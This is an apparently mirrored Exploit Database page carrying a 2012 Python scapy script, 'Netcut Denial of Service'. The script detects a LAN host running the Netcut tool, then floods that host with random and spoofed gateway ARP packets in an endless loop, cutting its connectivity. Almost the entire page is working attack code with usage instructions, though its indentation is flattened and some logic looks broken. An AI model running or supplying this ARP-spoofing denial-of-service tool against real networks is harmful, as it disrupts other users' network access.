Netcut 2.0 – Denial of Service

• Exploit Database
• 16 阅读

• 作者： MaYaSeVeN
  日期： 2012-01-04
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18318/

• #!/usr/bin/env python
  #Exploit Title: Netcut Denial of Service Vulnerability
  #Author: MaYaSeVeN
  #Blog: http://mayaseven.blogspot.com
  #PoC: Videohttp://www.youtube.com/user/mayaseven
  # Picture http://3.bp.blogspot.com/-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAxs/wSGL1tKGflc/s1600/a.png
  #Version: Netcut 2
  #Software Link: http://www.mediafire.com/?jiiyq2wcpp41266
  #Tested on: Windows Xp, Windows 7
  #Greetz :ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma
  
  from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf
  import commands,os,sys
  
  #gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2]
  gw_ip= commands.getoutput("ip route list | grep default").split()[2]
  
  def protect(gw_ip,gw_mac):
  os.popen("arp -s %s %s" %(gw_ip,gw_mac))
  print "Protected himself"
  
  def detect():
  ans = sniff(filter='arp',timeout=7)
  target=[]
  for r in ans.res:
  target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%")) 
  return target
  
  def preattack(gw_ip):
  num = []
  count = 0
  target = 0
  temp = 0
  print "Detecting..."
  d = detect()
  for i in range(len(d)):
  if d[i].split()[0] == "255.255.255.255":
  num.append(d.count(d[i])) 
  if d.count(d[i]) > count:
  count = d.count(d[i])
  target = i
  if d[i].split()[0] == gw_ip:
  temp += 1 
  if len(d) < 7:
  print "[-] No one use Netcut or try again"
  exit()
  if len(num)*7 < temp:
  num[:] = []
  count = 0
  result = float(temp)/len(d)*100
  for j in range(len(d)):
  if d[i].split()[0] == gw_ip:
  num.append(d.count(d[j]))
  if d.count(d[i]) > count:
  count = d.count(d[i])
  target = i
  num.reverse()
  result = float(temp)/len(d)*100
  print target 
  else:
  num.reverse()
  result = float(num[0]+temp)/len(d)*100
  
  print "There is a possibility that " + str(result) + "%"
  if result>= 50:
  target_mac = d[target].split()[1]
  target_ip = d[target].split()[2]
  print "[+]Detected, Netcut using by IP %s MAC %s" %(target_ip,target_mac)
  attack(target_mac,target_ip,gw_ip)
  else:
  print "[-] No one use Netcut or try again"
  
  def attack(target_mac,target_ip,gw_ip):
  print "[+]Counter Attack !!!"
  e = Ether(dst="FF:FF:FF:FF:FF:FF")
  while 1:
  a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=1)
  p = e/a/Padding("\x00"*18)
  sendp(p,verbose=0)
  a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2)
  p1 = e/a1/Padding("\x00"*18)
  sendp(p1,verbose=0)
  
  if __name__ == '__main__':
  os.system("clear")
  print "###################################################"
  print" ______ _______ _____ _"
  print"|\/| \ \ / / / ____|\ \/ / | \ | |"
  print"| \/ | __ \ \_/ /_ _| (___ __\ \/ /__|\| |"
  print"| |\/| |/ _\ \ / _\ |\___ \ / _ \ \/ / _ \ . \ |"
  print"| || | (_| || | (_| |____) |__/\/__/ |\|"
  print"|_||_|\__,_||_|\__,_|_____/ \___| \/ \___|_| \_|"
  print " "
  print "###################################################"
  print ""
  print "http://mayaseven.blogspot.com"
  print ""
  if len(sys.argv) == 2 or len(sys.argv) == 3:
  if len(sys.argv) == 2:
  conf.iface=sys.argv[1]
  preattack(gw_ip)
  if len(sys.argv) == 3:
  conf.iface=sys.argv[1]
  gw_mac = sys.argv[2]
  protect(gw_ip,gw_mac)
  preattack(gw_ip)
  else:
  print '''Mode: 
  1.)Attack only
  Usage: NetcutKiller <Interface>
  e.g. NetcutKiller.py wlan0
  
  2.)Attack with protect himself
  Usage: NetcutKiller <Interface> <MAC_Gateway> 
  e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF 
  '''